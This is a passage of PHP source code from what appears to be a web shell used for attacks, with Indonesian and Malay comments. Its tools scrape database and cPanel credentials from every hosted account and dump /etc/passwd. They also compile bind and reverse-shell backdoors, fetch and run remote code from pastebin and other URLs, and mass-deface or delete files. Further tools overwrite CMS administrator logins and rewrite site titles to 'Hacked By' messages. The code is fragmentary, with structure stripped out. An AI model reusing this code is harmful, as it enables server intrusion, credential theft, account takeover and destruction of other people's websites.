                    "/home1/$user_Exc/public_html/sites/default/settings.php" => "Drupal",
                    "/home1/$user_Exc/public_html/config/settings.inc.php" => "PrestaShop",
                    "/home1/$user_Exc/public_html/app/etc/local.xml" => "Magento",
                    "/home1/$user_Exc/public_html/joomla/configuration.php" => "Joomla",
                    "/home1/$user_Exc/public_html/configuration.php" => "Joomla",
                    "/home1/$user_Exc/public_html/wp/wp-config.php" => "WordPress",
                    "/home1/$user_Exc/public_html/wordpress/wp-config.php" => "WordPress",
                    "/home1/$user_Exc/public_html/wp-config.php" => "WordPress",
                    "/home1/$user_Exc/public_html/admin/config.php" => "OpenCart",
                    "/home1/$user_Exc/public_html/slconfig.php" => "Sitelok",
                    "/home1/$user_Exc/public_html/application/config/database.php" => "Ellislab",
                    "/home2/$user_Exc/.my.cnf" => "cpanel",
                    "/home2/$user_Exc/.accesshash" => "WHM-accesshash",
                    "/home2/$user_Exc/public_html/bw-configs/config.ini" => "BosWeb",
                    "/home2/$user_Exc/public_html/config/koneksi.php" => "Lokomedia",
                    "/home2/$user_Exc/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
                    "/home2/$user_Exc/public_html/clientarea/configuration.php" => "WHMCS",
                    "/home2/$user_Exc/public_html/whm/configuration.php" => "WHMCS",
                    "/home2/$user_Exc/public_html/whmcs/configuration.php" => "WHMCS",
                    "/home2/$user_Exc/public_html/forum/config.php" => "phpBB",
                    "/home2/$user_Exc/public_html/sites/default/settings.php" => "Drupal",
                    "/home2/$user_Exc/public_html/config/settings.inc.php" => "PrestaShop",
                    "/home2/$user_Exc/public_html/app/etc/local.xml" => "Magento",
                    "/home2/$user_Exc/public_html/joomla/configuration.php" => "Joomla",
                    "/home2/$user_Exc/public_html/configuration.php" => "Joomla",
                    "/home2/$user_Exc/public_html/wp/wp-config.php" => "WordPress",
                    "/home2/$user_Exc/public_html/wordpress/wp-config.php" => "WordPress",
                    "/home2/$user_Exc/public_html/wp-config.php" => "WordPress",
                    "/home2/$user_Exc/public_html/admin/config.php" => "OpenCart",
                    "/home2/$user_Exc/public_html/slconfig.php" => "Sitelok",
                    "/home2/$user_Exc/public_html/application/config/database.php" => "Ellislab",
                    "/home3/$user_Exc/.my.cnf" => "cpanel",
                    "/home3/$user_Exc/.accesshash" => "WHM-accesshash",
                    "/home3/$user_Exc/public_html/bw-configs/config.ini" => "BosWeb",
                    "/home3/$user_Exc/public_html/config/koneksi.php" => "Lokomedia",
                    "/home3/$user_Exc/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
                    "/home3/$user_Exc/public_html/clientarea/configuration.php" => "WHMCS",
                    "/home3/$user_Exc/public_html/whm/configuration.php" => "WHMCS",
                    "/home3/$user_Exc/public_html/whmcs/configuration.php" => "WHMCS",
                    "/home3/$user_Exc/public_html/forum/config.php" => "phpBB",
                    "/home3/$user_Exc/public_html/sites/default/settings.php" => "Drupal",
                    "/home3/$user_Exc/public_html/config/settings.inc.php" => "PrestaShop",
                    "/home3/$user_Exc/public_html/app/etc/local.xml" => "Magento",
                    "/home3/$user_Exc/public_html/joomla/configuration.php" => "Joomla",
                    "/home3/$user_Exc/public_html/configuration.php" => "Joomla",
                    "/home3/$user_Exc/public_html/wp/wp-config.php" => "WordPress",
                    "/home3/$user_Exc/public_html/wordpress/wp-config.php" => "WordPress",
                    "/home3/$user_Exc/public_html/wp-config.php" => "WordPress",
                    "/home3/$user_Exc/public_html/admin/config.php" => "OpenCart",
                    "/home3/$user_Exc/public_html/slconfig.php" => "Sitelok",
                    "/home3/$user_Exc/public_html/application/config/database.php" => "Ellislab"
                foreach ($grab_config as $config => $nama_config)
                    $ambil_config = file_get_contents($config);
                    if ($ambil_config == '')
                        $file_config = fopen("Exc_config/$user_Exc-$nama_config.txt", "w");
                        fputs($file_config, $ambil_config);
        echo "<center><a class = 'ajx' href='?dir=$dir/Exc_config'><font color=lime>Done</font></a></center>";
        $baru = hex($dir);
        $baru2 = hex('bypass-passwd');
        echo "<hr><br><center>";
        echo "<h2>Config Grabber Shell</h2>";
        echo "<form method=\"post\" action=\"\"><center>etc/passwd ( Error ? <a class = 'ajx' href='?d=$baru&$baru2'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area form-control' rows='15' cols='60'>\n";
        echo file_get_contents('/etc/passwd');
        echo "</textarea><br><input type=\"submit\" value=\"Grab\" class = 'form-control' style='width:250px;'></td></tr></center>\n";
        echo "<br><hr>";
elseif (isset($_GET[hex('network') ]))

    $dir = path();
    // bind connect with c
    if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C'))
        $port = trim($_POST['port']);
        $passwrd = trim($_POST['bind_pass']);
        tulis("bdc.c", $port_bind_bd_c);
        exe("gcc -o bdc bdc.c");
        exe("chmod 777 bdc");
        exe("./bdc " . $port . " " . $passwrd . " &");
        $scan = exe("ps aux");
        if (eregi("./bdc $por", $scan))
            $msg = "<p>Process found running, backdoor setup successfully.</p>";
            $msg = "<p>Process not found running, backdoor not setup successfully.</p>";
    // bind connect with perl
    elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl'))
        $port = trim($_POST['port']);
        $passwrd = trim($_POST['bind_pass']);
        tulis("bdp", $port_bind_bd_pl);
        exe("chmod 777 bdp");
        $p2 = which("perl");
        exe($p2 . " bdp " . $port . " &");
        $scan = exe("ps aux");
        if (eregi("$p2 bdp $port", $scan))
            $msg = "<p>Process found running, backdoor setup successfully.</p>";
            $msg = "<p>Process not found running, backdoor not setup successfully.</p>";
    // back connect with c
    elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C'))
        $ip = trim($_POST['ip']);
        $port = trim($_POST['backport']);
        tulis("bcc.c", $back_connect_c);
        exe("gcc -o bcc bcc.c");
        exe("chmod 777 bcc");
        exe("./bcc " . $ip . " " . $port . " &");
        $msg = "Now script try connect to " . $ip . " port " . $port . " ...";
    // back connect with perl
    elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl'))
        $ip = trim($_POST['ip']);
        $port = trim($_POST['backport']);
        tulis("bcp", $back_connect);
        exe("chmod +x bcp");
        $p2 = which("perl");
        exe($p2 . " bcp " . $ip . " " . $port . " &");
        $msg = "Now script try connect to " . $ip . " port " . $port . " ...";
    elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd']))
        $pilihan = trim($_POST['pilihan']);
        $wurl = trim($_POST['wurl']);
        $namafile = download($pilihan, $wurl);
        if (is_file($namafile))

            $msg = exe($wcmd);
        else $msg = "error: file not found $namafile";

				<h2>Netsploit Shell</h2>
				<table class="tabnet">
						<th>Port Binding</th>
						<th>Connect Back</th>
						<th>Load and Exploit</th>
								<form method="post">
										<td>Port <br><br><br>Pass<br><br><br><br><br></td>
										<td><input class="form-control" type="text" name="port" size="26" value="<?php echo $bindport ?>"><br><br><input class="form-control" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"><br><select class="form-control" size="1" name="use">
												<option value="Perl">Perl</option>
												<option value="C">C</option>
											</select><br><input class="form-control" type="submit" name="bind" value="Bind" style="width:80px"></td>
								<form method="post">
										<td><input class="form-control" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("")); ?>"><br><br><input class="form-control" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"><br><select size="1" class="form-control" name="use">
												<option value="Perl">Perl</option>
												<option value="C">C</option>
											</select><br><input type="submit" name="backconn" value="Connect" class="form-control" style="width:100px"></td>

								<form method="post">
										<td><input class="form-control" type="text" name="wurl" style="width:220px;" value="www.some-code/exploits.c"><br><br><input class="form-control" type="text" name="wcmd" style="width:220px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"><br><select size="1" class="form-control" name="pilihan">
												<option value="wwget">wget</option>
												<option value="wlynx">lynx</option>
												<option value="wfread">fread</option>
												<option value="wfetch">fetch</option>
												<option value="wlinks">links</option>
												<option value="wget">GET</option>
												<option value="wcurl">curl</option>
											</select><br><input type="submit" name="expcompile" class="form-control" value="Go" style="width:80px;"></td>
			<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
elseif (isset($_GET[hex('cgi') ]))

    echo "<hr><br>";
    echo "<center>
						<h2> CGI Shell </h2> <br><br>
						<form method = 'POST'>
						<div class = 'row clearfix'>
						<div class = 'col-md-4'>
						<input type = 'submit' name = 'cgi' class = 'form-control' value = 'CGI Perl' style='width: 250px;' height='10'>
						<div class = 'col-md-4'>
						<input type = 'submit' name = 'cgi2' class = 'form-control' value = 'CGI Perl 2' style='width: 250px;' height='10'>
						<div class = 'col-md-4'>
						<input type = 'submit' name = 'cgipy' class = 'form-control' value = 'CGI Python' style='width: 250px;' height='10'>

    if (isset($_POST['cgi']))

        $cgi_dir = mkdir('ia_cgi', 0755);
        $file_cgi = "cgi.Index_Attacker";
        $memeg = ".htaccess";
        $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .Index_Attacker \n AddHandler cgi-script .Index_Attacker \n AddHandler cgi-script .Index_Attacker";

        $htcgi = fopen(".htaccess", "w");

        $ch = curl_init("https://pastebin.com/raw/Lj46KxFT");
        $cgi = fopen($file_cgi, "w");
        curl_setopt($ch, CURLOPT_FILE, $cgi);
        curl_setopt($ch, CURLOPT_HEADER, 0);

        fwrite($htcgi, $isi_htcgi);
        chmod($file_cgi, 0755);
        chmod($memeg, 0755);
        echo "<br><center>Done ... <a href='$server/ia_cgi/cgi.Index_Attacker' target='_blank'>Klik Here</a>";
    elseif (isset($_POST['cgi2']))

        $cgi_dir = mkdir('ia_cgi', 0755);
        $file_cgi = "cgi2.Index_Attacker";
        $memeg = ".htaccess";
        $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .Index_Attacker \n AddHandler cgi-script .Index_Attacker ";
        $htcgi = fopen(".htaccess", "w");
        $ch = curl_init("https://pastebin.com/raw/ZPZMC6K4");
        $cgi = fopen($file_cgi, "w");
        curl_setopt($ch, CURLOPT_FILE, $cgi);
        curl_setopt($ch, CURLOPT_HEADER, 0);

        fwrite($htcgi, $isi_htcgi);
        chmod($file_cgi, 0755);
        chmod($memeg, 0755);
        echo "<br><center>Done ... <a href='ia_cgi/cgi2.Index_Attacker' target='_blank'>Klik Here</a>";
    elseif (isset($_POST['cgipy']))

        $cgi_dir = mkdir('ia_cgi', 0755);
        $file_cgi = "cgipy.Index_Attacker";
        $memeg = ".htaccess";
        $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .Index_Attacker \n AddHandler cgi-script .Index_Attacker \n AddHandler cgi-script .Index_Attacker";
        $htcgi = fopen(".htaccess", "w");
        $ch = curl_init("https://pastebin.com/raw/MYyXAXyY");
        $cgi = fopen($file_cgi, "w");
        curl_setopt($ch, CURLOPT_FILE, $cgi);
        curl_setopt($ch, CURLOPT_HEADER, 0);

        fwrite($htcgi, $isi_htcgi);
        chmod($file_cgi, 0755);
        chmod($memeg, 0755);
        echo "<br><center>Done ... <a href='ia_cgi/cgipy.Index_Attacker' target='_blank'>Klik Here</a>";
elseif (isset($_GET[hex('mass_tool') ]))
    $dir = path();
    echo "<center><form action=\"\" method=\"post\">\n";
    $dirr = $_POST['d_dir'];
    $index = $_POST["script"];
    $index = str_replace('"', "'", $index);
    $index = stripslashes($index);
    function edit_file($file, $index)
        if (is_writable($file))
            clear_fill($file, $index);
            echo "<Span style='color:green;'><strong> [+] 100% Successfull </strong></span><br></center>";
            echo "<Span style='color:red;'><strong> [-] Turns out you can't lather here :( </strong></span><br></center>";
    function hapus_massal($dir, $namafile)
        if (is_writable($dir))
            $dira = scandir($dir);
            foreach ($dira as $dirb)
                $dirc = "$dir/$dirb";
                $lokasi = $dirc . '/' . $namafile;
                if ($dirb === '.')
                    if (file_exists("$dir/$namafile"))
                elseif ($dirb === '..')
                    if (file_exists("" . dirname($dir) . "/$namafile"))
                        unlink("" . dirname($dir) . "/$namafile");
                    if (is_dir($dirc))
                        if (is_writable($dirc))
                            if (file_exists($lokasi))
                                echo "DELETED $lokasi<br>";
                                $idx = hapus_massal($dirc, $namafile);
    function clear_fill($file, $index)
        if (file_exists($file))
            $handle = fopen($file, 'w');
            fwrite($handle, '');
            fwrite($handle, $index);

    function gass()
        global $dirr, $index;
        $me = str_replace(dirname(__FILE__) . '/', '', __FILE__);
        $files = scandir($dirr);
        $notallow = array(
        $n = 0;
        foreach ($files as $file)
            if ($file != $me && is_dir($file) != 1 && !in_array($file, $notallow))
                echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
                edit_file($file, $index);
                $n = $n + 1;
        echo "<br>";
        echo "<center><br><h3>$n The time you've been scrambling here </h3></center><br>";
    function ListFiles($dirrall)

        if ($dh = opendir($dirrall))

            $files = array();
            $inner_files = array();
            $me = str_replace(dirname(__FILE__) . '/', '', __FILE__);
            $notallow = array(
            while ($file = readdir($dh))
                if ($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow))
                    if (is_dir($dirrall . "/" . $file))
                        $inner_files = ListFiles($dirrall . "/" . $file);
                        if (is_array($inner_files)) $files = array_merge($files, $inner_files);
                        array_push($files, $dirrall . "/" . $file);

            return $files;
    function gass_all()
        global $index;
        $dirrall = $_POST['d_dir'];
        foreach (ListFiles($dirrall) as $key => $file)
            $file = str_replace('//', "/", $file);
            echo "<center><strong>$file</strong> ===>";
            edit_file($file, $index);
        $key = $key + 1;
        echo "<center><br><h3>$key The time you've been scrambling here  </h3></center><br>";
    function sabun_massal($dir, $namafile, $isi_script)
        if (is_writable($dir))
            $dira = scandir($dir);
            foreach ($dira as $dirb)
                $dirc = "$dir/$dirb";
                $lokasi = $dirc . '/' . $namafile;
                if ($dirb === '.')
                    file_put_contents($lokasi, $isi_script);
                elseif ($dirb === '..')
                    file_put_contents($lokasi, $isi_script);
                    if (is_dir($dirc))
                        if (is_writable($dirc))
                            echo "[<font color=lime>DONE</font>] $lokasi<br>";
                            file_put_contents($lokasi, $isi_script);
                            $idx = sabun_massal($dirc, $namafile, $isi_script);
    if ($_POST['mass'] == 'onedir')
        echo "<br> Version Text Area<br><textarea class = 'form-control' name='index' rows='10' cols='67'>\n";
        $ini = "http://";
        $mainpath = $_POST[d_dir];
        $file = $_POST[d_file];
        $dir = opendir("$mainpath");
        $code = base64_encode($_POST[script]);
        $indx = base64_decode($code);
        while ($row = readdir($dir))
            $start = @fopen("$row/$file", "w+");
            $finish = @fwrite($start, $indx);
            if ($finish)
                echo "$ini$row/$file\n";
        echo "</textarea><br><b>Versi Text</b><br><br><br>\n";
        $mainpath = $_POST[d_dir];
        $file = $_POST[d_file];
        $dir = opendir("$mainpath");
        $code = base64_encode($_POST[script]);
        $indx = base64_decode($code);
        while ($row = readdir($dir))
            $start = @fopen("$row/$file", "w+");
            $finish = @fwrite($start, $indx);
            if ($finish)
                echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>';
        echo "<hr>";
    elseif ($_POST['mass'] == 'sabunkabeh')
    elseif ($_POST['mass'] == 'hapusmassal')
        hapus_massal($_POST['d_dir'], $_POST['d_file']);
    elseif ($_POST['mass'] == 'sabunmematikan')
    elseif ($_POST['mass'] == 'massdeface')
        echo "<div style='margin: 5px auto; padding: 5px'>";
        sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
        echo "</div>";
        echo "
		<center><h2>Mass Deface / Delete Files Shell</h2><font style='text-decoration: underline;'>
		Select Type:<br>
		<select class=\"form-control\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
		<option value=\"onedir\">Mass Deface 1 Dir</option>
		<option value=\"massdeface\">Mass Deface ALL Dir</option>
		<option value=\"sabunkabeh\">Mass Deface Di Tempat</option>
		<option value=\"sabunmematikan\">Bunuh Diri</option>
		<option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
		<font style='text-decoration: underline;'>Folder:</font><br>
		<input class= 'form-control' type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
		<font style='text-decoration: underline;'>Filename:</font><br>
		<input class= 'form-control' type='text' name='d_file' value='Exc.php' style='width: 450px;' height='10'><br>
		<font style='text-decoration: underline;'>Index File:</font><br>
		<textarea class= 'form-control' name='script' style='width: 450px; height: 200px;'>Hacked By ./Localhost Malaysia</textarea><br>
		<input class= 'form-control' type='submit' name='start' value='Mass Deface' style='width: 450px;'>
elseif (isset($_GET[hex('mass_user') ]))
    if ($_POST['hajar'])
        if (strlen($_POST['pass_baru']) < 6 or strlen($_POST['user_baru']) < 6)
            print "username atau password mesti lebih dari 6 karakter";
            $user_baru = $_POST['user_baru'];
            $pass_baru = md5($_POST['pass_baru']);
            $conf = $_POST['config_dir'];

            if (preg_match("/^http:\/\//", $conf) or preg_match("/^https:\/\//", $conf))
                $get = curl($conf);
                preg_match_all('/<a href="(.*?).txt">/', $get, $link);
                foreach ($link[1] as $link_config)
                    $scan_conf[] = "$link_config.txt";
                $scan_conf = scandir($conf);

            foreach ($scan_conf as $file_conf)
                $config = file_get_contents("$conf/$file_conf");
                if (preg_match("/JConfig|joomla/", $config))
                    $dbhost = getValue($config, "host = '", "'");
                    $dbuser = getValue($config, "user = '", "'");
                    $dbpass = getValue($config, "password = '", "'");
                    $dbname = getValue($config, "db = '", "'");
                    $dbprefix = getValue($config, "dbprefix = '", "'");
                    $prefix = $dbprefix . "users";
                    $conn = mysql_connect($dbhost, $dbuser, $dbpass);
                    $db = mysql_select_db($dbname);
                    $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
                    $result = mysql_fetch_array($q);
                    $id = $result['id'];
                    $site = getValue($config, "sitename = '", "'");
                    $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
                    print "Config => " . $file_conf . "<br>";
                    print "CMS => Joomla<br>";
                    if ($site == '')
                        print "Sitename => " . color(1, 1, "Can't get domain name") . "<br>";
                        print "Sitename => $site<br>";
                    if (!$update or !$conn or !$db)
                        print "Status => " . color(1, 1, mysql_error()) . "<br><br>";
                        print "Status => " . color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.") . "<br><br>";
                elseif (preg_match("/WordPress/", $config))
                    $dbhost = getValue($config, "DB_HOST', '", "'");
                    $dbuser = getValue($config, "DB_USER', '", "'");
                    $dbpass = getValue($config, "DB_PASSWORD', '", "'");
                    $dbname = getValue($config, "DB_NAME', '", "'");
                    $dbprefix = getValue($config, "table_prefix  = '", "'");
                    $prefix = $dbprefix . "users";
                    $option = $dbprefix . "options";
                    $conn = mysql_connect($dbhost, $dbuser, $dbpass);
                    $db = mysql_select_db($dbname);
                    $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
                    $result = mysql_fetch_array($q);
                    $id = $result[ID];
                    $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
                    $result2 = mysql_fetch_array($q2);
                    $target = $result2[option_value];
                    if ($target == '')
                        $url_target = "Login => " . color(1, 1, "Cant't get domain name") . "<br>";
                        $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
                    $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
                    print "Config => " . $file_conf . "<br>";
                    print "CMS => Wordpress<br>";
                    print $url_target;
                    if (!$update or !$conn or !$db)
                        print "Status => " . color(1, 1, mysql_error()) . "<br><br>";
                        print "Status => " . color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.") . "<br><br>";
                elseif (preg_match("/Magento|Mage_Core/", $config))
                    $dbhost = getValue($config, "<host><![CDATA[", "]]></host>");
                    $dbuser = getValue($config, "<username><![CDATA[", "]]></username>");
                    $dbpass = getValue($config, "<password><![CDATA[", "]]></password>");
                    $dbname = getValue($config, "<dbname><![CDATA[", "]]></dbname>");
                    $dbprefix = getValue($config, "<table_prefix><![CDATA[", "]]></table_prefix>");
                    $prefix = $dbprefix . "admin_user";
                    $option = $dbprefix . "core_config_data";
                    $conn = mysql_connect($dbhost, $dbuser, $dbpass);
                    $db = mysql_select_db($dbname);
                    $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
                    $result = mysql_fetch_array($q);
                    $id = $result[user_id];
                    $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
                    $result2 = mysql_fetch_array($q2);
                    $target = $result2[value];
                    if ($target == '')
                        $url_target = "Login => " . color(1, 1, "Cant't get domain name") . "<br>";
                        $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
                    $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
                    print "Config => " . $file_conf . "<br>";
                    print "CMS => Magento<br>";
                    print $url_target;
                    if (!$update or !$conn or !$db)
                        print "Status => " . color(1, 1, mysql_error()) . "<br><br>";
                        print "Status => " . color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.") . "<br><br>";
                elseif (preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $config))
                    $dbhost = getValue($config, "'DB_HOSTNAME', '", "'");
                    $dbuser = getValue($config, "'DB_USERNAME', '", "'");
                    $dbpass = getValue($config, "'DB_PASSWORD', '", "'");
                    $dbname = getValue($config, "'DB_DATABASE', '", "'");
                    $dbprefix = getValue($config, "'DB_PREFIX', '", "'");
                    $prefix = $dbprefix . "user";
                    $conn = mysql_connect($dbhost, $dbuser, $dbpass);
                    $db = mysql_select_db($dbname);
                    $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
                    $result = mysql_fetch_array($q);
                    $id = $result[user_id];
                    $target = getValue($config, "HTTP_SERVER', '", "'");
                    if ($target == '')
                        $url_target = "Login => " . color(1, 1, "Cant't get domain name") . "<br>";
                        $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
                    $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
                    print "Config => " . $file_conf . "<br>";
                    print "CMS => OpenCart<br>";
                    print $url_target;
                    if (!$update or !$conn or !$db)
                        print "Status => " . color(1, 1, mysql_error()) . "<br><br>";
                        print "Status => " . color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.") . "<br><br>";
                elseif (preg_match("/panggil fungsi validasi xss dan injection/", $config))
                    $dbhost = getValue($config, 'server = "', '"');
                    $dbuser = getValue($config, 'username = "', '"');
                    $dbpass = getValue($config, 'password = "', '"');
                    $dbname = getValue($config, 'database = "', '"');
                    $prefix = "users";
                    $option = "identitas";
                    $conn = mysql_connect($dbhost, $dbuser, $dbpass);
                    $db = mysql_select_db($dbname);
                    $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
                    $result = mysql_fetch_array($q);
                    $target = $result[alamat_website];
                    if ($target == '')
                        $target2 = $result[url];
                        $url_target = "Login => " . color(1, 1, "Cant't get domain name") . "<br>";
                        if ($target2 == '')
                            $url_target2 = "Login => " . color(1, 1, "Cant't get domain name") . "<br>";
                            $cek_login3 = file_get_contents("$target2/adminweb/");
                            $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
                            if (preg_match("/CMS Lokomedia|Administrator/", $cek_login3))
                                $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
                            elseif (preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4))
                                $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
                                $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
                        $cek_login = file_get_contents("$target/adminweb/");
                        $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
                        if (preg_match("/CMS Lokomedia|Administrator/", $cek_login))
                            $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
                        elseif (preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2))
                            $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
                            $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
                    $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
                    print "Config => " . $file_conf . "<br>";
                    print "CMS => Lokomedia<br>";
                    if (preg_match("/Can't get domain name/", $url_target))
                        print $url_target2;
                        print $url_target;
                    if (!$update or !$conn or !$db)
                        print "Status => " . color(1, 1, mysql_error()) . "<br><br>";
                        print "Status => " . color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.") . "<br><br>";
        print "<center>
				<h2>Mass User Changer Shell</h2>
				<form method='post'>
				<input type='radio' name='config_type' value='dir' checked>DIR Config <input type='radio' name='config_type' value='link'>LINK Config<br><br>

				<input type='text' size='50' name='config_dir' style='width:250px;' height = '10' class='form-control' value='" . path() . "'><br><br>
				Set User & Pass: <br>
				<input type='text' style='width:250px;' height = '10' class='form-control' name='user_baru' value='localhost' placeholder='user_baru'><br>
				<input type='text' style='width:250px;' height = '10' class='form-control' name='pass_baru' value='localhost' placeholder='pass_baru'><br>
				<input class = 'form-control' style='width: 215px; margin: 5px auto;' type='submit' name='hentam' value='Hentam'>
elseif (isset($_GET[hex('mass_title') ]))
    echo "<hr><br><center><h2>Mass Title Changer Shell</h2>
<form method='post'>
Link Config: <br>
<input type='text' class = 'form-control' height='10' name='linkconf' height='10' style='width: 450px;' placeholder='http://website.com/ia_symconf/'><br><br>
<input type='submit' class = 'form-control' height='10' style='width: 450px;' name='gass' value='Submit!!' class='oke'>
    if ($_POST['gass'])
        echo "<center>
<form method='post'>
Link Config: <br>
<textarea name='link'>";
        GrabUrl($_POST['linkconf'], 'wordpress');
        echo "</textarea><br>ID: <input class = 'form-control'  type='text' name='id' value='1'><br>TITLE :<input type='text' name='title' value='Hacked By Index_Attacker'><br>POST CONTENT: <input type='text' name='content' value='Hacked By Index_Attacker'><br>POSTNAME: <input type='text' name='postname' value='HackeD By Index_Attacker'><br>
<input type='submit' style='width: 450px;' name='edittitle' value='Hajar!!'>
    if ($_POST['edittitle'])
        $title = htmlspecialchars($_POST['title']);
        $id = $_POST['id'];
        $content = $_POST['content'];
        $postname = $_POST['name'];
        function anucurl($sites)
            $ch = curl_init($sites);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
            curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
            curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
            curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
            curl_setopt($ch, CURLOPT_COOKIESESSION, true);
            $data = curl_exec($ch);
            return $data;
        $link = explode("\r\n", $_POST['link']);
        foreach ($link as $dir_config)
            $config = anucurl($dir_config);
            $dbhost = ambilkata($config, "DB_HOST', '", "'");
            $dbuser = ambilkata($config, "DB_USER', '", "'");
            $dbpass = ambilkata($config, "DB_PASSWORD', '", "'");
            $dbname = ambilkata($config, "DB_NAME', '", "'");
            $dbprefix = ambilkata($config, "table_prefix  = '", "'");
            $prefix = $dbprefix . "posts";
            $option = $dbprefix . "options";
            $conn = mysql_connect($dbhost, $dbuser, $dbpass);
            $db = mysql_select_db($dbname);
            $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
            $result = mysql_fetch_array($q);
            $id = $result[ID];
            $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
            $result2 = mysql_fetch_array($q2);
            $target = $result2[option_value];
            $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$content',post_name='$postname',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
            $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
            echo "<div style='margin: 5px auto;'>";
            if ($target == '')
                echo "URL: <font color=red>error, tidak boleh mendapatkan nama domain</font> -> ";
                echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
            if (!$update or !$conn or !$db)
                echo "<font color=red>MySQL Error: " . mysql_error() . "</font><br>";
                echo "<font color=lime>berjaya di ganti.</font><br>";
            echo "</div>";
elseif (isset($_GET[hex('bypass') ]))
    echo "<hr><br>";
    echo "<center><h2>Bypasser Shell</h2></center><br>";
    echo "<form method = 'POST'>
						<div class = 'row clearfix'>
						<div class = 'col-md-3'>
						<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex('bypass-cf') . "' style='width: 250px;' height='10'><center>Bypass CloudFlare</center></a>
						<div class = 'col-md-3'>
						<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex('bypass-server') . "' style='width: 250px;' height='10'><center>Bypass Server</center></a>
						<div class = 'col-md-3'>
						<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex('bypass-vhost') . "' style='width: 250px;' height='10'><center>Bypass Vhost</center></a>
						<div class = 'col-md-3'>
